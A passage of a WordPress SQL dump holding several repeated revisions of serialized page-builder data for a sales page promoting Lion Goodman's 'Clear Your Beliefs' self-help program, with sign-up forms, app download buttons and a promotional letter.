value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1210:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" style="position: relative; bottom: -50px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2812:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:511:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><p> </p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:63:"<hr /><center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1328, 1785, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1448:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2076:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1210:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" style="position: relative; bottom: -50px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2812:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:513:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n\n</div>\n<hr>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1329, 1786, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1448:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2127:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1210:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" style="position: relative; bottom: -50px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2812:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have 